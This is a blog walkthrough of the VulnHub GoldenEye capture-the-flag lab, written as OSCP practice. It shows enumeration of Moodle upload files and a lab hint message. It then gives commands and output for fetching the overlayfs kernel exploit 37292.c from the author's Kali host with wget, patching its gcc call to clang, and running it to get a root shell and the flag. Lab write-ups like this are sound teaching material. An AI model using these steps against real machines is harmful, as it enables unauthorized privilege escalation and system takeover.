Ahhh makes me wanna play Goldeneye...
Lets check the exif data on this one...
Nah nothing...

So I check out splashAdmin.php:

Hard to read, but the line that sounds most interesting is: "For programming I highly prefer the Alternative to GCC, which FreeBSD uses. It's more verbose when compiling, throwing warnings and such - this can easily be turned off with a proper flag. I've replaced GCC with this throughout the GolenEye systems. "

I'll keep that in mind. I keep looking through the file system, especially under /var/www and find some uploaded files through moodle:

-rw-rw-rw- 1 www-data www-data 168 Apr 23 21:16 warning.txt

./05:
total 4
drwxrwsrwx 2 www-data www-data 4096 Aug 15 19:46 6d

./05/6d:
total 8
-rw-rw-rw- 1 www-data www-data 4795 Aug 15 19:46 056d495e4768cf97825602ed6a1096eab6d67a5a

./82:
total 4
drwxrwsrwx 2 www-data www-data 4096 Apr 24 16:10 34

./82/34:
total 1496
-rw-rw-rw- 1 www-data www-data 1529575 Apr 24 16:10 82341a17005e75a8f4614ea435acbc3148cf30ea

./a6:
total 4
drwxrwsrwx 2 www-data www-data 4096 Apr 24 16:15 f9

./a6/f9:
total 4
-rw-rw-rw- 1 www-data www-data 3242 Apr 24 16:15 a6f9eb0b8ac65934fb6adc15766fb2fa70e1873d

./ad:
total 4
drwxrwsrwx 2 www-data www-data 4096 Apr 24 18:28 5c

./ad/5c:
total 4
-rw-rw-rw- 1 www-data www-data 364 Apr 24 18:28 ad5c3bc9ae900b39509eb2d6a727455e39d77b9b

./da:
total 4
drwxrwsrwx 2 www-data www-data 4096 Apr 24 16:10 39

./da/39:
total 0
-rw-rw-rw- 1 www-data www-data 0 Apr 24 16:10 da39a3ee5e6b4b0d3255bfef95601890afd80709
www-data@ubuntu:/var/www/moodledata/filedir$

First one is an attempted php moodle exploit I tried previously.

www-data@ubuntu:/var/www/moodledata/filedir/05/6d$ file 82341a17005e75a8f4614ea435acbc3148cf30ea BORIS GIF
82341a17005e75a8f4614ea435acbc3148cf30ea: GIF image data, version 89a, 500 x 278

www-data@ubuntu:/var/www/moodledata/filedir/a6/f9$ file a6f9eb0b8ac65934fb6adc15766fb2fa70e1873d NATALYA GIF
<odledata/filedir/a6/f9$ file a6f9eb0b8ac65934fb6adc15766fb2fa70e1873d
a6f9eb0b8ac65934fb6adc15766fb2fa70e1873d: JPEG image data, JFIF standard 1.01

www-data@ubuntu:/var/www/moodledata/filedir/ad/5c$ file ad5c3bc9ae900b39509eb2d6a727455e39d77b9b
<odledata/filedir/ad/5c$ file ad5c3bc9ae900b39509eb2d6a727455e39d77b9b
ad5c3bc9ae900b39509eb2d6a727455e39d77b9b: ASCII text, with CRLF line terminators

^Just contained this text message:
007,

I was able to capture this apps adm1n cr3ds through clear txt.

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

Last one is empty:

www-data@ubuntu:/var/www/moodledata/filedir/da/39$ file da39a3ee5e6b4b0d3255bfef95601890afd80709
<odledata/filedir/da/39$ file da39a3ee5e6b4b0d3255bfef95601890afd80709
da39a3ee5e6b4b0d3255bfef95601890afd80709: empty

Nothing fun here...
Going back to the Linux version, let check what kernel exploits we have available for 3.13.0:

root@kali:~/Documents/vulnhub/goldeneye# searchsploit Linux Kernel 3.13.0
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow) | exploits/linux/local/37293.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

hmm lets have a look... I've used this one before. However, it relies on gcc for compiling.

Based on the message I read earlier, quick google: "freebsd gcc equivalent clang"
https://unix.stackexchange.com/questions/49906/why-is-freebsd-deprecating-gcc-in-favor-of-clang-llvm

After briefly reading, it seems clang is a compatible compiler... Hmm lets try this!

Host it on my kali machine:

root@kali:~/Documents/vulnhub/goldeneye# cp /usr/share/exploitdb/exploits/linux/local/37292.c .
root@kali:~/Documents/vulnhub/goldeneye# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Download and compile:

www-data@ubuntu:/tmp$ wget http://192.168.111.129/37292.c
wget http://192.168.111.129/37292.c
--2018-08-19 02:52:53-- http://192.168.111.129/37292.c
Connecting to 192.168.111.129:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
Saving to: '37292.c'

100%[======================================>] 5,119 --.-K/s in 0s

2018-08-19 02:52:53 (1013 MB/s) - '37292.c' saved [5119/5119]

www-data@ubuntu:/tmp$ which cc
which cc
/usr/bin/cc
www-data@ubuntu:/tmp$ which clang
which clang
/usr/bin/clang
www-data@ubuntu:/tmp$ clang 37292.c -o a
clang 37292.c -o a
37292.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
37292.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)
^
37292.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
^
37292.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);
^
37292.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);
^
5 warnings generated.
www-data@ubuntu:/tmp$ ls
ls
37292.c a vmware-root
www-data@ubuntu:/tmp$

Hmmm that looked easy?
Lets see?

www-data@ubuntu:/tmp$ ./a
./a
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 1: gcc: not found
couldn't create dynamic library
www-data@ubuntu:/tmp$

Hmm gcc not found? Let's check the exploit code...
Line 143:
lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");

I edit this and replace it with clang
Let's re-download that now:

www-data@ubuntu:/tmp$ wget http://192.168.111.129/37292_edited.c
wget http://192.168.111.129/37292_edited.c
--2018-08-19 02:58:49-- http://192.168.111.129/37292_edited.c
Connecting to 192.168.111.129:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [text/plain]
Saving to: '37292_edited.c'

100%[======================================>] 5,123 --.-K/s in 0s

2018-08-19 02:58:49 (10.9 MB/s) - '37292_edited.c' saved [5123/5123]

Recompile again:

www-data@ubuntu:/tmp$ clang 37292_edited.c -o b
clang 37292_edited.c -o b
37292_edited.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
37292_edited.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)
^
37292_edited.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
^
37292_edited.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);
^
37292_edited.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);
^
5 warnings generated.
www-data@ubuntu:/tmp$ ls -l
ls -l
total 76
-rw-rw-rw- 1 www-data www-data 5119 Aug 19 02:47 37292.c
-rw-rw-rw- 1 www-data www-data 5123 Aug 19 02:58 37292_edited.c
-rwxrwxrwx 1 www-data www-data 13773 Aug 19 02:53 a
-rwxrwxrwx 1 www-data www-data 13780 Aug 19 02:58 a.out
-rwxrwxrwx 1 www-data www-data 13780 Aug 19 02:59 b
drwxrwxrwx 5 www-data www-data 4096 Aug 19 02:54 ns_sploit
-rwxrwxrwx 1 www-data www-data 418 Aug 19 02:54 ofs-lib.c
drwx------ 2 root root 4096 Aug 19 01:19 vmware-root

Let's see what happens now:

www-data@ubuntu:/tmp$ ./b
./b
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
whoami
root
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#

FINALLY! YES!!!!!

Now for the flag:
# cd /root
cd /root
# ls -la
ls -la
total 44
drwx------ 3 root root 4096 Apr 29 19:28 .
drwxr-xr-x 22 root root 4096 Apr 24 21:57 ..
-rw-r--r-- 1 root root 19 May 3 10:08 .bash_history
-rw-r--r-- 1 root root 3106 Feb 19 2014 .bashrc
drwx------ 2 root root 4096 Apr 28 11:00 .cache
-rw------- 1 root root 144 Apr 29 19:16 .flag.txt
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw------- 1 root root 1024 Apr 23 20:23 .rnd
-rw------- 1 root root 8296 Apr 29 10:18 .viminfo
# cat .flag.txt
cat .flag.txt
Alec told me to place the codes here:

568628e0d993b1973adc718237da6e93

If you captured this make sure to go here.....
/006-final/xvf7-flag/

Another one down.
I'm going to have to see how much a N64 goes for on eBay now!

--> n33dle

}==[n33dle]>----

Sunday 19 August 2018

Vulnhub Walkthrough - Goldeneye

My OSCP journey